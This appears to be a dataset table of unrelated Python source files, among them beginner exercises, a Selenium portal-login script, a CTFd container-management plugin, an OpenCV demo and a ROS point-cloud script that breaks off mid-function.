text stringlengths 38 1.54M |
|---|
def removeValor(numeros, valor):
retorno = []
tamNumeros = len(numeros)
for cont in range(tamNumeros):
elemento = numeros[cont]
if(elemento != valor):
retorno.append(elemento)
return retorno
print(removeValor([1,2,4,5,6,3,2,4,5,12,2,3,2,4,5,2], 2))
|
class Car:
def __init__(self, pMake, pModel, pColor, pPrice):
self.make = pMake
self.model = pModel
self.color = pColor
self.price = pPrice
def __str__(self):
return 'Make = %s, Model = %s, Color = %s, Price = %s' %(self.make, self.model, self.color, self.price)
def selectColor(self):
self.color = input('What is the new color? ')
def calculateTax(self):
priceWithTax = 1.1*self.price
return priceWithTax
myFirstCar = Car('Honda','Civic','White',15000)
print(myFirstCar)
myFirstCar.price = 18000
print(myFirstCar)
myFirstCar.selectColor()
tax = myFirstCar.calculateTax()
print(tax)
class Room:
def __init__(self, pSize, pView, pType, pBasicRates):
self.size = pSize
self.view = pView
self.type = pType
self.basicrates = pBasicRates
def __str__(self):
return 'Size = %s, View = %s, Type = %s, Basic Rates = %s' %(self.size, self.view, self.type, self.basicrates)
def calculateRates(self, day):
if day.lower() == 'weekend':
return self.basicrates*1.5
elif day.lower() == 'public holidays':
return self.basicrates*2
elif day.lower() == 'christmas':
return self.basicrates*2.5
else:
return self.basicrates
room1 = Room(132,'City','double',120)
print(room1)
print(room1.calculateRates('Public Holidays'))
class HumanResource:
def __init__(self, pName, pSalary, pBonus):
self.name = pName
self.salary = pSalary
self._bonus = pBonus
def __str__(self):
return 'Name = %s, Salary = %.2f, Bonus = %.2f' %(self.name, self.salary, self._bonus)
@property
def bonus(self):
return self._bonus
@bonus.setter
def bonus(self,value):
if value < 0:
return 'value cannot be less than 0'
else:
return value |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from getpass import getpass
phantomjs_exe = ".\\bin\\phantomjs.exe"
username = input("ENTER USERNAME - ")
if username == "":
f = open(".\\bin\\one_cred.txt")
cred = f.read().splitlines()
f.close()
username = cred[0]
password = cred[1]
print("Using stored username \"" + username + "\"")
else:
print()
print("Nothing will seem to type, but you are putting in your password anyway")
password = getpass("ENTER PASSWORD - ")
print("Loading browser (phantomJS)...")
#driver = webdriver.Firefox()
driver = webdriver.PhantomJS(phantomjs_exe)
print("Loading msftconnecttest.com...")
xpath = driver.find_element_by_xpath
print("Logging in...")
try:
driver.get("[redacted]")
print("Logging in...")
xpath('//*[@id="cmd_acceptAup"]').click()
xpath('//*[@id="username"]').send_keys(username)
xpath('//*[@id="password"]').send_keys(password)
xpath('//*[@id="password"]').send_keys(Keys.RETURN)
except Exception as e:
print(e["errormessage"])
print("\n\n")
print("There was an error (displayed above).")
print("Maybe you are not connected, or are already logged in?")
input()
time.sleep(5) |
import re
#import csv
tag = re.compile(r'nav-\w+')
with open ('/Users/ymccarter/PycharmProjects/Mihon/Make-Life-Easy/DefCreation/awsdef4.yaml', 'r') as myfile:
data = myfile.readlines()
print(tag.search('My number is Value: nav-navigatorauthgateway'))
fw = open('deftag.txt', 'w')
deftag = []
for line in data:
print(line)
if re.search(tag, line):
line=line.replace(' Value: ','')
deftag.append(line)
fw.write(line)
print(deftag)
#2nd example:
"""
Author Yukie McCarter
Date 9/30/18
This python program specifically convert NPInboud.yml to CSV value
1. using Openpyxl module
2. Create the List for each item Cidr, Destination service, Protocol (tcp or udp and so on) And FromPort and ToPort list
3.Sending column in order
"""
"""working
with open ('NP-Prod-Inbound.yml', 'r') as myfile: #open the YML file and correct data
data = myfile.readlines()
#print (data)
Cidr=[]
Destination=[]
protocol = []
IpProtocol=[]
FromPort=[]
ToPort=[]
for line in data:
if "CidrIp" in line:
line=line.replace('CidrIp: ','')
Cidr.append(line)
if "Fn::ImportValue: " in line:
line=line.replace("Fn::ImportValue: ","")
Destination.append(line)
if "IpProtocol: " in line:
line=line.replace('IpProtocol: ','')
IpProtocol.append(line)
if "FromPort: " in line:
line=line.replace("FromPort: ","")
FromPort.append(line)
if "ToPort: " in line:
line=line.replace("ToPort: ","")
ToPort.append(line)
from openpyxl import Workbook
#nfc_east = ('DAL', 'WAS', 'PHI', 'NYG')
wb = Workbook()
ws = wb.active
ws['A1']='Source Cidr'
ws['B1']='Destination Service'
ws['C1']='IpProtocol'
ws['D1']='FromPort'
ws['E1']='ToPort'
for row, i in enumerate(Cidr):
column_cell = 'A'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(Destination):
column_cell = 'B'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(IpProtocol):
column_cell = 'C'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(FromPort):
column_cell = 'D'
ws[column_cell+str(row+2)] = str(i)
for row, i in enumerate(ToPort):
column_cell = 'E'
ws[column_cell+str(row+2)] = str(i)
wb.save("NpProd-Inbound-Cidr.xlsx")
"""
def Yml2Createlist(file,savedfile): #function's calling item is YAML filename and Excel workbook name
with open (file, 'r') as myfile: #open the YML file and correct data
data = myfile.readlines()
#print (data)
Cidr=[] #list of Cidr address
Destination=[] #List of Destination service
IpProtocol=[] #list of protocol tcp, udp, gre, and so on
FromPort=[] #list of FromPort
ToPort=[] #list of ToPort
for line in data: #Appending the value to each data with cleanup the format.
if "CidrIp" in line:
line=line.replace('CidrIp: ','')
Cidr.append(line)
if "Fn::ImportValue: " in line:
line=line.replace("Fn::ImportValue: ","")
Destination.append(line)
if "IpProtocol: " in line:
line=line.replace('IpProtocol: ','')
IpProtocol.append(line)
if "FromPort: " in line:
line=line.replace("FromPort: ","")
line=line.replace("'","")
FromPort.append(line)
if "ToPort: " in line:
line=line.replace("ToPort: ","")
line=line.replace("'","")
ToPort.append(line)
from openpyxl import Workbook #open the excel file
# nfc_east = ('DAL', 'WAS', 'PHI', 'NYG')
wb = Workbook() #defined 'wb' as command
ws = wb.active #activated it
ws['A1'] = 'Source Cidr' #creating title of column
ws['B1'] = 'Destination Service' #creating title of column
ws['C1'] = 'IpProtocol'#creating title of column
ws['D1'] = 'FromPort'#creating title of column
ws['E1'] = 'ToPort'#creating title of column
for row, i in enumerate(Cidr):
column_cell = 'A'
ws[column_cell + str(row + 2)] = str(i)
for row, i in enumerate(Destination):
column_cell = 'B'
ws[column_cell + str(row + 2)] = str(i)
for row, i in enumerate(IpProtocol):
column_cell = 'C'
ws[column_cell + str(row + 2)] = str(i)
for row, i in enumerate(FromPort):
column_cell = 'D'
ws[column_cell + str(row + 2)] = str(i)
for row, i in enumerate(ToPort):
column_cell = 'E'
ws[column_cell + str(row + 2)] = str(i)
wb.save(savedfile)
Yml2Createlist('NP-Prod-Inbound.yml',"NpProd-Inbound-Cidr.xlsx") |
import sys
import math
from elevator import *
DOOR_OPEN_TIME = 10
FLOORS_PER_SECOND = 1
INITIAL_FLOOR = 1
WAIT_TIME = 1
INFINITY = 9999
BUSY_FLOORS = {0:0, 1:1, 10:0, 100:0} #key is each floor, value specifies whether an elevator has been assigned to that floor or not
class Guest(object):
def __init__(self, id, startTime, startFloor, destinationFloor):
self.id = id
self.startTime = startTime
self.startFloor = startFloor
self.destinationFloor = destinationFloor
self.waitTime = 0
self.calledElevator = False
self.onElevator = False
def isGoingUp(self):
return self.destinationFloor > self.startFloor
def wait(self):
self.waitTime += WAIT_TIME
if self.onElevator:
#pass
print 'Guest', self.id, 'going to floor', self.destinationFloor, 'waiting for', self.waitTime, 'seconds, on elevator', self.onElevator
else:
#pass
print 'Guest', self.id, 'starting on floor', self.startFloor, 'going to floor', self.destinationFloor, 'waiting for', self.waitTime, 'seconds, not on elevator yet'
def addElevator(self, elevator):
self.onElevator = elevator
def __str__(self):
return "ID: " + str(self.id) + " Start Time: " + str(self.startTime) + " Start Floor: " + str(self.startFloor) + " Destination Floor: " + str(self.destinationFloor) + " Waiting Time: " + str(self.waitTime) |
list_of_numbers = []
def adding_to_list():
number_of_numbers = 5
order = 0
suffix = ""
while number_of_numbers > 0:
number_of_numbers = number_of_numbers - 1
order = order + 1
if order == 1:
suffix = "st"
elif order == 2:
suffix = "nd"
elif order == 3:
suffix = "rd"
elif order == 4 or 5:
suffix = "th"
list_of_numbers.append(int(input(f"Enter the {order}{suffix} number of the list: ")))
adding_to_list()
print(list_of_numbers)
sum_of_numbers = 0
for numbers in list_of_numbers:
numbers = numbers ** 2
sum_of_numbers = sum_of_numbers + numbers
print(f"The sum of the squares of the numbers in the list is {sum_of_numbers}!")
|
__author__ = 'gkour'
from simulator import Simulator, SimState
from visualization.dashboard import Dashboard
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import tkinter as tk
from tkinter import ttk, Scale
import matplotlib.pyplot as plt
from config import ConfigPhysics
import sys
from queue import Queue
plt.style.use('seaborn-paper')
LARGE_FONT = ("Verdana", 12)
class OriginGUI:
def __init__(self, master, *args, **kwargs):
tk.Tk.wm_title(master, "Project Origin")
#master.iconbitmap(default="visualization/originicon.bmp")
self.master = master
self.msg_queue = Queue()
container = tk.Frame(master)
container.pack(side="top", fill="both", expand=True)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
self._simulation_page = SimulationPage(container, master, self.msg_queue)
self._simulation_page.grid(row=0, column=0, sticky="nsew")
self._simulation_page.tkraise()
def refresh_data(self, msg):
self._simulation_page.refresh_data(msg)
def process_incoming_msg(self):
"""Handle all messages currently in the queue, if any."""
while self.msg_queue.qsize():
try:
self.refresh_data(self.msg_queue.get())
except Exception as exp:
print(str(exp))
pass
class SimulationPage(tk.Frame):
def __init__(self, parent, controller, queue):
self._dashboard = Dashboard()
self.controller = controller
self.simulator = Simulator(queue)
self.window_closed = False
tk.Frame.__init__(self, parent, bg='white')
title_label = tk.Label(self, text="Project Origin Dashboard", font=LARGE_FONT, foreground='blue', bg='white')
title_label.pack(pady=10, padx=10)
self.s = ttk.Style()
#self.s.theme_use('vista')
self.status_label = tk.Label(self, text="Simulator Ready.", bg='white')
self.status_label.pack(pady=10, padx=10)
self.sim_btn = ttk.Button(self, text="Start Simulation", command=lambda: self.on_simulation_btn_click())
self.sim_btn.pack()
self.food_creature_scale = Scale(self, from_=0, to=1, orient=tk.HORIZONTAL, resolution=0.1, bg='white',
command=lambda x: self.set_food_creature_ratio(x))
self.food_creature_scale.set(ConfigPhysics.FOOD_CREATURE_RATIO)
self.food_creature_scale.pack()
dash_fig = self._dashboard.get_figure()
canvas = FigureCanvasTkAgg(dash_fig, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
controller.protocol("WM_DELETE_WINDOW", self.close_window_event)
self.on_simulation_btn_click()
def close_window_event(self):
self.stop_simulation()
self.window_closed = True
if self.simulator.status() == SimState.IDLE:
self.close_window()
def close_window(self):
self.controller.destroy()
sys.exit()
def refresh_data(self, msg):
if type(msg) == SimState:
print(msg.value)
if msg == SimState.IDLE:
self.sim_btn['text'] = 'Start Simulation'
self.sim_btn['state'] = tk.ACTIVE
if self.window_closed:
self.close_window()
self.status_label['text'] = str(msg.value)
else:
self._dashboard.update_step_dash(msg.step_stats_df)
self._dashboard.update_epoch_dash(msg.epoch_stats_df)
def on_simulation_btn_click(self):
if self.sim_btn['text'] == 'Start Simulation':
self.start_simulation()
self.sim_btn['text'] = 'Stop Simulation'
else:
self.stop_simulation()
self.sim_btn['state'] = tk.DISABLED
def stop_simulation(self):
self.simulator.stop()
self.status_label['text'] = "Simulation Interrupted. Stopping..."
def start_simulation(self):
self.simulator.run_in_thread()
@staticmethod
def set_food_creature_ratio(new):
ConfigPhysics.FOOD_CREATURE_RATIO = float(new)
|
# 物料编号申请模块
import json
from base_api.base import Base
from utils.get_pass_day import get_pass_date
from utils.get_today import get_today_date
class MatCodeApply(Base):
def search_by_order_no(self, order_no):
"""
根据单号查询
:param order_no: 单号
:return:
"""
url = self.ip + "/api/scm/auth/np/npMatCodeApplyH/list.do"
params = {
"orderNo": order_no,
"orderDayStart": get_pass_date(90),
"orderDayEnd": get_today_date(),
"page": 1,
"pageSize": 50,
"skipWarn": "false",
}
r = self.s.post(url=url, params=params)
# return json.dumps(r.json(), indent=2, ensure_ascii=False)
return r.json()
if __name__ == "__main__":
test = MatCodeApply()
print(test.search_by_order_no("1"))
|
from __future__ import division # Use floating point for math calculations
from CTFd.plugins import register_plugin_assets_directory
from CTFd.plugins.flags import get_flag_class
from CTFd.utils.user import get_current_user
from CTFd import utils
from CTFd.models import (
db,
Solves,
Fails,
Flags,
Challenges,
ChallengeFiles,
Tags,
Hints,
Users,
Notifications
)
from flask import render_template, request, jsonify, Blueprint, current_app
from CTFd.utils.user import get_ip
from CTFd.utils.uploads import delete_file
from CTFd.utils.decorators import admins_only, authed_only
from CTFd.utils.modes import get_model
from CTFd.utils import user as current_user
from .models import DynamicCheckValueChallenge, DynamicCheckChallenge
from CTFd.plugins.challenges import CHALLENGE_CLASSES
from .db_utils import DBUtils
from .control_utils import ControlUtil
from .frp_utils import FrpUtils
import datetime, fcntl
from flask_apscheduler import APScheduler
import logging, os, sys
from .extensions import get_mode
def load(app):
# upgrade()
app.db.create_all()
CHALLENGE_CLASSES["dynamic_check_docker"] = DynamicCheckValueChallenge
register_plugin_assets_directory(
app, base_path="/plugins/ctfd-owl/assets/"
)
owl_blueprint = Blueprint(
"ctfd-owl",
__name__,
template_folder="templates",
static_folder="assets",
url_prefix="/plugins/ctfd-owl"
)
log_dir = app.config["LOG_FOLDER"]
logger_owl = logging.getLogger("owl")
logger_owl.setLevel(logging.INFO)
logs = {
"owl": os.path.join(log_dir, "owl.log"),
}
try:
for log in logs.values():
if not os.path.exists(log):
open(log, "a").close()
container_log = logging.handlers.RotatingFileHandler(
logs["owl"], maxBytes=10000
)
logger_owl.addHandler(container_log)
except IOError:
pass
stdout = logging.StreamHandler(stream=sys.stdout)
logger_owl.addHandler(stdout)
logger_owl.propagate = 0
@owl_blueprint.route('/admin/settings', methods=['GET'])
@admins_only
# list plugin settings
def admin_list_configs():
configs = DBUtils.get_all_configs()
return render_template('configs.html', configs=configs)
@owl_blueprint.route('/admin/settings', methods=['PATCH'])
@admins_only
# modify plugin settings
def admin_save_configs():
req = request.get_json()
DBUtils.save_all_configs(req.items())
return jsonify({'success': True})
@owl_blueprint.route("/admin/containers", methods=['GET'])
@admins_only
# list alive containers
def admin_list_containers():
mode = utils.get_config("user_mode")
configs = DBUtils.get_all_configs()
page = abs(request.args.get("page", 1, type=int))
results_per_page = 50
page_start = results_per_page * (page - 1)
page_end = results_per_page * (page - 1) + results_per_page
count = DBUtils.get_all_alive_container_count()
containers = DBUtils.get_all_alive_container_page(page_start, page_end)
pages = int(count / results_per_page) + (count % results_per_page > 0)
return render_template("containers.html", containers=containers, pages=pages, curr_page=page,
curr_page_start=page_start, configs=configs, mode=mode)
@owl_blueprint.route("/admin/containers", methods=['PATCH'])
@admins_only
def admin_expired_container():
user_id = request.args.get('user_id')
challenge_id = request.args.get('challenge_id')
ControlUtil.expired_container(user_id=user_id, challenge_id=challenge_id)
return jsonify({'success': True})
@owl_blueprint.route("/admin/containers", methods=['DELETE'])
@admins_only
def admin_delete_container():
user_id = request.args.get('user_id')
ControlUtil.destroy_container(user_id)
return jsonify({'success': True})
# instances
@owl_blueprint.route('/container', methods=['GET'])
@authed_only
def list_container():
try:
user_id = get_mode()
challenge_id = request.args.get('challenge_id')
ControlUtil.check_challenge(challenge_id, user_id)
data = ControlUtil.get_container(user_id=user_id)
configs = DBUtils.get_all_configs()
domain = configs.get('frp_http_domain_suffix', "")
if data is not None:
if int(data.challenge_id) != int(challenge_id):
return jsonify({})
dynamic_docker_challenge = DynamicCheckChallenge.query \
.filter(DynamicCheckChallenge.id == data.challenge_id) \
.first_or_404()
lan_domain = str(user_id) + "-" + data.docker_id
if dynamic_docker_challenge.deployment == "single":
return jsonify({'success': True, 'type': 'redirect', 'ip': configs.get('frp_direct_ip_address', ""),
'port': data.port,
'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
'lan_domain': lan_domain})
else:
if dynamic_docker_challenge.redirect_type == "http":
if int(configs.get('frp_http_port', "80")) == 80:
return jsonify({'success': True, 'type': 'http', 'domain': data.docker_id + "." + domain,
'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
'lan_domain': lan_domain})
else:
return jsonify({'success': True, 'type': 'http',
'domain': data.docker_id + "." + domain + ":" + configs.get('frp_http_port', "80"),
'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
'lan_domain': lan_domain})
else:
return jsonify({'success': True, 'type': 'redirect', 'ip': configs.get('frp_direct_ip_address', ""),
'port': data.port,
'remaining_time': 3600 - (datetime.datetime.utcnow() - data.start_time).seconds,
'lan_domain': lan_domain})
else:
return jsonify({'success': True})
except Exception as e:
return jsonify({'success': False, 'msg': str(e)})
@owl_blueprint.route('/container', methods=['POST'])
@authed_only
def new_container():
try:
user_id = get_mode()
if ControlUtil.frequency_limit():
return jsonify({'success': False, 'msg': 'Frequency limit, You should wait at least 1 min.'})
# check whether exist container before
existContainer = ControlUtil.get_container(user_id)
if existContainer:
return jsonify({'success': False, 'msg': 'You have boot {} before.'.format(existContainer.challenge.name)})
else:
challenge_id = request.args.get('challenge_id')
ControlUtil.check_challenge(challenge_id, user_id)
configs = DBUtils.get_all_configs()
current_count = DBUtils.get_all_alive_container_count()
# print(configs.get("docker_max_container_count"))
if configs.get("docker_max_container_count") != "None":
if int(configs.get("docker_max_container_count")) <= int(current_count):
return jsonify({'success': False, 'msg': 'Max container count exceed.'})
dynamic_docker_challenge = DynamicCheckChallenge.query \
.filter(DynamicCheckChallenge.id == challenge_id) \
.first_or_404()
try:
result = ControlUtil.new_container(user_id=user_id, challenge_id=challenge_id)
if isinstance(result, bool):
return jsonify({'success': True})
else:
return jsonify({'success': False, 'msg': str(result)})
except Exception as e:
return jsonify({'success': True, 'msg':'Failed when launch instance, please contact with the admin.'})
except Exception as e:
return jsonify({'success': False, 'msg': str(e)})
@owl_blueprint.route('/container', methods=['DELETE'])
@authed_only
def destroy_container():
user_id = get_mode()
if ControlUtil.frequency_limit():
return jsonify({'success': False, 'msg': 'Frequency limit, You should wait at least 1 min.'})
if ControlUtil.destroy_container(user_id):
return jsonify({'success': True})
else:
return jsonify({'success': False, 'msg': 'Failed when destroy instance, please contact with the admin!'})
@owl_blueprint.route('/container', methods=['PATCH'])
@authed_only
def renew_container():
user_id = get_mode()
if ControlUtil.frequency_limit():
return jsonify({'success': False, 'msg': 'Frequency limit, You should wait at least 1 min.'})
configs = DBUtils.get_all_configs()
challenge_id = request.args.get('challenge_id')
ControlUtil.check_challenge(challenge_id, user_id)
docker_max_renew_count = int(configs.get("docker_max_renew_count"))
container = ControlUtil.get_container(user_id)
if container is None:
return jsonify({'success': False, 'msg': 'Instance not found.'})
if container.renew_count >= docker_max_renew_count:
return jsonify({'success': False, 'msg': 'Max renewal times exceed.'})
ControlUtil.expired_container(user_id=user_id, challenge_id=challenge_id)
return jsonify({'success': True})
def auto_clean_container():
with app.app_context():
results = DBUtils.get_all_expired_container()
for r in results:
ControlUtil.destroy_container(r.user_id)
FrpUtils.update_frp_redirect()
app.register_blueprint(owl_blueprint)
try:
lock_file = open("/tmp/ctfd_owl.lock", "w")
lock_fd = lock_file.fileno()
fcntl.lockf(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
scheduler = APScheduler()
scheduler.init_app(app)
scheduler.start()
scheduler.add_job(id='owl-auto-clean', func=auto_clean_container, trigger="interval", seconds=5)
print("[CTFd Owl]Started successfully")
except IOError:
pass |
import os,time
Tree=[]
Incomplete_Paths=[]
def Is_File(Path):
return os.path.isfile(Path)
def File_Path_Handler(Dir):
Branches=List_Items_In(Dir)
for branch in Branches:
Path=Dir+'/'+branch
if Is_File(Path):
Tree.append(Path.lower())
else:
Incomplete_Paths.append(Path)
def List_Items_In(Dir):
Items=[]
for x in os.listdir(Dir):
Items.append(x)
return Items
def Tree_Builder(Base_Dir):
File_Path_Handler(Base_Dir)
for x in Incomplete_Paths:
File_Path_Handler(x)
Tree_Builder() #this is your main entry point
print Tree |
#!/usr/bin/env python
# pylint: disable=bare-except
import sys
from glob import glob as _glob
from pathlib import Path
import re
from subprocess import run
import os
import logging
from rich.panel import Panel
from rich.padding import Padding
from rich.console import Console
try:
from clavier import log as logging
from clavier.io import OUT
except ImportError:
import logging
from rich.console import Console
OUT = Console(file=sys.stdout)
LOG = logging.getLogger("stats.doctest")
REPO_ROOT = Path(__file__).parents[2]
PKG_ROOT = REPO_ROOT / 'cli'
ARGS = sys.argv[1:]
def glob(path):
return _glob(str(path), recursive=True)
def rel(path):
try:
return f"./{Path(path).relative_to(Path.cwd())}"
except:
return str(path)
def is_doctest(path):
with open(path, 'r') as f:
for line in f:
# if re.match(r'\s*\>\>\>', line):
if re.match(r'\s*doctest(?:ing)?\.testmod\(.*\)', line):
return True
return False
def module_for(path):
return ".".join(
str(Path(path).relative_to(PKG_ROOT))[:-3].split('/')
)
def module_roots(pkg_root: Path=PKG_ROOT):
for path_s in glob(pkg_root / "*" / "__init__.py"):
path = Path(path_s).parents[0]
yield path
def pkg_modules(pkg_root: Path=PKG_ROOT):
for module_root in module_roots(pkg_root):
for path_s in glob(module_root / "**" / "*.py"):
path = Path(path_s)
if is_doctest(path):
yield (module_for(path), path)
def env():
return {**os.environ, "DOCTESTING": "yup"}
def test(name, cmd):
r = run(cmd, capture_output=True, encoding='utf8', env=env(), check=False)
if r.returncode == 0 and len(r.stdout) == 0:
OUT.print(":white_check_mark:", name)
return True
else:
if r.stdout:
OUT.print(Panel(Padding(r.stdout, 1), title=f"STDOUT {name}"))
if r.stderr:
OUT.print(Panel(Padding(r.stderr, 1), title=f"STDERR {name}"))
OUT.print(":x:", name)
return False
def test_module(module):
return test(module, ['python', '-m', module])
def test_file(path):
return test(rel(path), ['python', '-m', 'doctest', path])
def is_pkg_module(path):
try:
Path(path).relative_to(PKG_ROOT / 'stats')
except:
return False
return True
def main():
if hasattr(logging, "setup"):
logging.setup("stats.doctest", level=logging.DEBUG)
else:
logging.basicConfig(level=logging.DEBUG)
ok = True
if len(ARGS) == 0:
for module, path in pkg_modules():
ok = ok and test_module(module)
else:
for arg in ARGS:
if is_pkg_module(arg):
ok = ok and test_module(module_for(arg))
else:
ok = ok and test_file(arg)
if not ok:
sys.exit(1)
if __name__ == '__main__':
main()
|
from functools import partial
from mmcv.runner import get_dist_info
from mmcv.parallel import collate
from torch.utils.data import DataLoader
import numpy as np
# https://github.com/pytorch/pytorch/issues/973
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (4096, rlimit[1]))
def worker_init_fn(worker_id):
np.random.seed(np.random.get_state()[1][0] + worker_id)
def build_dataloader(dataset, sampler, batch_size, workers_per_gpu, dist=True, **kwargs):
if dist:
num_workers = workers_per_gpu
else:
raise NotImplementedError
data_loader = DataLoader(dataset,
batch_size=batch_size,
sampler=sampler,
num_workers=num_workers,
pin_memory=True,
drop_last=True,
worker_init_fn=worker_init_fn)
return data_loader
|
from geopy import geocoders
from pandas import merge, DataFrame
import time
def geocoder (df):
'''Takes a string of location information and geocodes the info into lat/long
coordinates and creates a string of locations of each specimen.'''
#Library for geocoding
#Change to match the geocoding column
location_col_name = 'location'
#removed all rows with *
df = df[df[location_col_name].str.contains('\*') == 0]
#Drops on non-unique values off the column called location. Also will drop row(s) only if NaN is in the specific column
no_location_dup = df[location_col_name].drop_duplicates().dropna(subset=[location_col_name])
#Returned geocoded data
geoCodeAddress, geoLat, geoLng, rawLocation = [], [], [], []
#Iterates through the unique values of the raw_data and appends the data to an array
for index, location in enumerate(no_location_dup):
if index == 2498: # change to 2498 if not testing
print 'Maximum requests reached. Rerun again in 24 hours or change ip address\n'
break
else:
try:
time.sleep(.50)
g = geocoders.GoogleV3()
place, (lat, lng) = g.geocode(location)
geoCodeAddress.append(place)
geoLat.append(lat)
geoLng.append(lng)
rawLocation.append(location)
print place #remove then not testing
except:
print 'passing on', location
pass
#del df['latitude'], df['longitude']
#Creates a Pandas DataFrame
geo_geocoded = DataFrame({location_col_name: rawLocation,
'geocoded': geoCodeAddress,
'latitude': geoLat,
'longitude': geoLng})
#Merges the orginal data and geocoded dataset on the column
return merge(df, geo_geocoded, on=location_col_name, how='outer')
|
from django.urls import path
from .views import IndexView, PostDetailView, ArchivesView, CategoryView, TagView, search
app_name = 'blog'
urlpatterns = [
path('', IndexView.as_view(), name='index'),
path('post/<int:pk>/', PostDetailView.as_view(), name='detail'),
path('archives/<int:year>/<int:month>/', ArchivesView.as_view(), name='archives'),
path('category/<int:pk>/', CategoryView.as_view(), name='category'),
path('tag/<int:pk>/', TagView.as_view(), name='tag'),
path('search/', search, name='search'),
]
|
from django.contrib.auth.base_user import BaseUserManager
from django.db import models
from db.base_model import BaseModel
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UgcUserManager(BaseUserManager):
use_in_migrations = True
def _create_user(self, username, password, **extra_fields):
if not username:
raise ValueError("请填入用户名")
if not password:
raise ValueError("请填入密码")
user = self.model(username=username, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, username, password, **extra_fields):
extra_fields.setdefault('is_staff', False)
extra_fields.setdefault('is_superuser', False)
return self._create_user(username, password, **extra_fields)
def create_superuser(self, username, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_superuser', True)
if extra_fields.get('is_staff') is not True:
raise ValueError("Superuser must have is_staff=True")
if extra_fields.get('is_superuser') is not True:
raise ValueError('Superuser must have is_superuser=True')
return self._create_user(username, password, **extra_fields)
class UgcUser(AbstractUser):
"""ugc用户表"""
identity = models.CharField(max_length=18, unique=True, verbose_name='身份证号')
score = models.IntegerField(default=0, verbose_name='积分')
name = models.CharField(max_length=10, verbose_name='真实姓名')
phone = models.CharField(max_length=11, verbose_name='手机号', unique=True)
# 将phone/email/username作为username_filed,而不是原来的username字段,需要重写username
username = models.CharField(max_length=150, verbose_name='用户名', unique=True)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['phone', 'email']
# 重新定义Manager对象,在创建user的时候,使用phone,email,username和password
objects = UgcUserManager()
class Meta:
unique_together = ['email', 'phone']
db_table = 'ugc_user'
verbose_name = 'ugc用户表'
verbose_name_plural = verbose_name
|
import cv2
import numpy as np
import imutils
imag = cv2.imread('/home/frkn/Desktop/fotolar/solalt.png')
image = cv2.cvtColor(imag,cv2.COLOR_BGR2GRAY)
imag = imutils.resize(imag,width=750)
image = imutils.resize(image,width=750)
filtered_image= cv2.bilateralFilter(image,11,17,17)
canny = cv2.Canny(filtered_image,100,150)
drawing = np.zeros(imag.shape,np.uint8)
drawing_2 = np.zeros(imag.shape,np.uint8)
image2,contours,hierarchy = cv2.findContours(canny.copy(),cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours :
cv2.drawContours(drawing_2,[cnt],-1,(0,255,0),3)
cv2.imshow('output_2',drawing_2)
for cnt in contours :
hull = cv2.convexHull(cnt)
cv2.drawContours(drawing,[cnt],-1,(0,255,0),3)
cv2.drawContours(imag,[hull],-1,(0,255,0),3)
cv2.imshow('output',drawing)
print(len(contours))
print (contours)
#print(len(selected_contour))
cv2.imshow('original',imag)
cv2.imshow('filtered image',filtered_image)
cv2.imshow('canny',canny)
cv2.waitKey(0)
|
#!/usr/bin/env python
import rospy
from roslib import message
import rosbag
import std_msgs.msg
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2, PointField
import numpy as np
# require the installation of ros-kinetic-tf2_sensor_msgs
from tf2_sensor_msgs.tf2_sensor_msgs import do_transform_cloud
# require the installation of transforms3d
import transforms3d
# require the installation of sympy
import sympy as sp
# from sympy import *
import subprocess
import tf
import math
from numpy.linalg import inv
import sys
import os
def process():
# pub = rospy.Publisher('velodyne_point_data', String, queue_size=10)
# while not rospy.is_shutdown():
rospy.init_node('test_velodyne',anonymous=True)
# bag_name should be the same for both rosbag and gicp_simplified_result
bag_name = "kitti_2011_09_26_drive_0005_synced"
bag_dir = "/home/cuberick/raw_data/rosbag/%s.bag" % (bag_name)
gicp_output_dir = "/home/cuberick/raw_data/gicp_simplified_output/%s.txt" % (bag_name)
bag = rosbag.Bag(bag_dir)
interval = 1
density = 50
duration = rospy.Duration(0.1,0)
number_of_frame = 152
# lengh_of_oxts = number_of_frame
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Read IMU-to-Velodyne Transformation Matrix
tcount = 1
print ("===============================================")
print ("| ---PROGRAM START--- |")
print ("| |")
print ("| |")
print ("| |")
print ("| Ver.gicp_incremental |")
print ("===============================================")
print
print
sys.stdout.write("KITTI sequence: %s" % bag_name)
print
sys.stdout.write("Frame interval: %d, Point density: %d" % (interval, density) )
# sys.stdout.flush()
print
print
print ("Bag LOADED")
print ("Please launch rviz")
print
print
sys.stdout.write("\r>>>Read tf info")
sys.stdout.flush()
# print
for topic, msg, t in bag.read_messages("/tf_static"):
# if tcount < 1:
# break
# tcount -= 1
# print count
All_tfs = msg.transforms
# Extract T_imu_to_velo
for transf in All_tfs:
if transf.child_frame_id == "velo_link":
T_imu_to_velo = transf.transform
# Transform between quaternion and Euler
T_imu_to_velo_Quaternion_rotation = T_imu_to_velo.rotation
T_imu_to_velo_translation = T_imu_to_velo.translation
# print(T_imu_to_velo_Quaternion_rotation)
quaternion = (
T_imu_to_velo_Quaternion_rotation.x,
T_imu_to_velo_Quaternion_rotation.y,
T_imu_to_velo_Quaternion_rotation.z,
T_imu_to_velo_Quaternion_rotation.w)
T_imu_to_velo_Euler_rotaiton = tf.transformations.euler_from_quaternion(quaternion)
# print(T_imu_to_velo_Euler_rotaiton)
roll = T_imu_to_velo_Euler_rotaiton[0]
